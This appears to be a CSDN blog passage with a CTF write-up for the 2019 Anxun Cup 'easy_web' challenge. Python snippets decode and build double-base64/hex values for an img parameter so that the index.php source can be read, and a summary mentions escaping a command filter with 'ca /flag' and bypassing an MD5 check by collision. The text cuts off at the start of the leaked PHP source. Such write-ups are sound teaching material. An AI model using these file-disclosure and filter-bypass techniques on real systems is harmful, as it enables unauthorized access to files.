[安洵杯 2019]easy_web(文件包含,md5碰撞,base64,书写参数细节)

这篇博客详细介绍了在安洵杯2019挑战中,如何利用文件包含漏洞和MD5碰撞来获取flag。首先,博主通过双重base64解码和hex转string获取了文件路径。接着,面对正则表达式的过滤,通过'ca /flag'进行命令逃逸。然后,针对MD5过滤,博主通过精心构造的MD5碰撞字符串a和b,成功绕过限制。最后,强调在提交参数时,a和b不能分开写,避免回车符影响。
摘要由CSDN通过智能技术生成

文件包含,base64
img=TXpVek5UTTFNbVUzTURabE5qYz0
这里的路径是经过了base64编码的,当时要注意的是这里在解码的时候记得要将末尾被省略掉的’='给加上去(猜测这里在解码的过程中可能有padding)(经过base64编码后个长度为4的倍数)
结果双重base64解码,然后hex 转string 之后就可以得到路径了.

c='TXpVek5UTTFNbVUzTURabE5qYz0='
import base64
from  Crypto.Util import number
import binascii
print(binascii.unhexlify(base64.b64decode(base64.b64decode(c)).decode()))

#b'555.png'

于是我们尝试得到index.php的源代码

m='index.php'
from Crypto.Util import number
tmp1=hex(number.bytes_to_long(m.encode()))[2:]
import base64
tmp2=base64.b64encode(tmp1.encode())
print(base64.b64encode(tmp2))

#b'TmprMlpUWTBOalUzT0RKbE56QTJPRGN3'

传这个参数,得到
在这里插入图片描述
.
base64解码

<?php
error_reporting(E_ALL || ~</
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值